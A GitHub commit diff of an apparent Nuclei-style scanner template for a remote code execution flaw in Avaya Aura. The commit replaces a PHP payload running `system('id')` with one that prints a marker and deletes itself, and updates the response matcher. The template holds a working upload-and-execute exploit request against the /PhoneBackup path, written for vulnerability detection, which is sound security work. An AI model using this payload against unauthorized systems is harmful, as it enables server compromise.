Update avaya-aura-rce.yaml

patch-1
J4vaovo 2023-06-15 19:24:13 +08:00 committed by GitHub
parent f61c0edc78
commit 67338b772a
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 4 additions and 4 deletions

View File

@ -26,7 +26,7 @@ http:
User-Agent: AVAYA User-Agent: AVAYA
Connection: close Connection: close
<?php system('id'); <?php print('avaya-aura-rce');unlink(__FILE__);
- | - |
GET /PhoneBackup/{{randstr}}.php HTTP/1.1 GET /PhoneBackup/{{randstr}}.php HTTP/1.1
@ -36,10 +36,10 @@ http:
matchers-condition: and matchers-condition: and
matchers: matchers:
- type: regex - type: word
part: body_2 part: body_2
regex: words:
- 'uid=\d+\(([^)]+)\) gid=\d+\(([^)]+)\)' - "avaya-aura-rce"
- type: word - type: word
part: header_2 part: header_2